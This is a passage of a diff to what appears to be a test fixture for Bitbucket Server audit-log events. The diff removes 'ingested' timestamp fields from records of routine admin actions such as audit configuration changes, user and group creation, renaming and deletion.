administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"SERVER_IS_SETUP\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"new\\\":true,\\\"old\\\":false}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":112000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -326,7 +322,6 @@ }, "event": { "action": "bitbucket.search.audit.action.elasticsearchconfigurationchange", - "ingested": "2021-12-24T00:37:41.020772972Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Elasticsearch settings changed\",\"actionI18nKey\":\"bitbucket.search.audit.action.elasticsearchconfigurationchange\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"bitbucket.search.audit.changedvalue.elasticsearchconfigurationchange.username\",\"key\":\"Username\",\"to\":\"bitbucket\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"changed\\\":\\\",elasticsearchPasswordelasticsearchUsername\\\",\\\"username\\\":\\\"bitbucket\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Elasticsearch\"}],\"method\":\"System\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034511,\"nano\":898000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -430,7 +425,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020773701Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"55 - 154\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:11.242Z - 2021-11-27T17:35:11.898Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034531,\"nano\":362000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -502,7 +496,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020774512Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"54\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:11.102Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 54\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034533,\"nano\":93000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -574,7 +567,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020775250Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:12.364Z - 2021-11-27T17:35:33.093Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"57 - 156\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034545,\"nano\":810000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -646,7 +638,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020775974Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:12.363Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"56\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 56\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034546,\"nano\":331000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -705,7 +696,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020776698Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"global_config_and_administration : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"global_config_and_administration : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":991000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -770,7 +760,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020777431Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"end_user_activity : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"end_user_activity : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":993000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -835,7 +824,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020778782Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"user_management : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"user_management : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -900,7 +888,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020779528Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"local_config_and_administration : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"local_config_and_administration : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -965,7 +952,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020780261Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"ecosystem : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"ecosystem : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1030,7 +1016,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020781039Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"permissions : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"permissions : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1095,7 +1080,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020781771Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"security : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"security : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1159,7 +1143,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020782630Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034578,\"nano\":370000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1237,7 +1220,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020783370Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"67 - 166\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:18.850Z - 2021-11-27T17:36:18.370Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034578,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1309,7 +1291,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020784099Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"66\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:18.849Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 66\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034579,\"nano\":269000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1375,7 +1356,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:41.020784942Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034600,\"nano\":674000000},\"version\":\"1.0\"}", "type": [ "user", @@ -1466,7 +1446,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020785680Z", "original": "{\"affectedObjects\":[{\"id\":\"stash-users\",\"name\":\"stash-users\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"stash-users\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"stash-users\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034600,\"nano\":692000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1545,7 +1524,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:41.020786407Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"User group created\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034684,\"nano\":808000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1636,7 +1614,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020787210Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"asdf\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034696,\"nano\":687000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1731,7 +1708,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipdeleted", - "ingested": "2021-12-24T00:37:41.020788047Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted from user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"asdf\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":\\\"test\\\",\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034703,\"nano\":209000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1810,7 +1786,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupdeleted", - "ingested": "2021-12-24T00:37:41.020788777Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"User group deleted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034709,\"nano\":423000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1885,7 +1860,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020789513Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User password changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034722,\"nano\":151000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", @@ -1977,7 +1951,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userrenamed", - "ingested": "2021-12-24T00:37:41.020790239Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Username changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userrenamed\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"test\",\"i18nKey\":\"bitbucket.service.user.audit.attribute.user.name\",\"key\":\"Username\",\"to\":\"test.user\"}],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test.user\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"oldUsername\\\":\\\"test\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034733,\"nano\":360000000},\"version\":\"1.0\"}", "type": [ "user", @@ -2055,7 +2028,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userdeleted", - "ingested": "2021-12-24T00:37:41.020791048Z", "original": "{\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test.user\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034738,\"nano\":87000000},\"version\":\"1.0\"}", "type": [ "user", @@ -2126,7 +2098,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020791783Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged 